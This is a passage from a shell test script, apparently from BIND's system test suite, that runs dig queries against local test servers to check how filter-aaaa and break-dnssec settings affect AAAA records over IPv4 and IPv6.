+status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.1 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns3.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6, recursive with break-dnssec ($n)" +if testsock6 fd92:7065:b8e:ffff::3 +then +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep 2001:db8::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add ns unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep AAAA dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv6, recursive with break-dnssec ($n)" +if testsock6 fd92:7065:b8e:ffff::3 +then +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +if ! testsock6 fd92:7065:b8e:ffff::1 +then + echo_i "IPv6 address not configured; skipping IPv6 query tests" + echo_i "exit status: $status" + exit $status +fi + +# Reconfiguring for IPv6 tests +echo_i "reconfiguring servers" +copy_setports ns1/named2.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 +copy_setports ns4/named2.conf.in ns4/named.conf +rndc_reconfig ns4 10.53.0.4 + +# BEGIN IPv6 TESTS + +# +# Authoritative tests against: +# filter-aaaa-on-v6 yes; +# filter-aaaa { fd92:7065:b8e:ffff::1; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep ::2 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep ::5 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep ::3 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns1.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4 ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 2001:db8::6 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep AAAA dig.out.ns1.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, signed ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4 ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + + +# +# Authoritative tests against: +# filter-aaaa-on-v6 break-dnssec; +# filter-aaaa { fd92:7065:b8e:ffff::4; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep ::2 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep ::5 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns4.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4 with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep 2001:db8::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep AAAA dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + + +# +# Recursive tests against: +# filter-aaaa-on-v6 yes; +# filter-aaaa { fd92:7065:b8e:ffff::2; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep ::5 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr 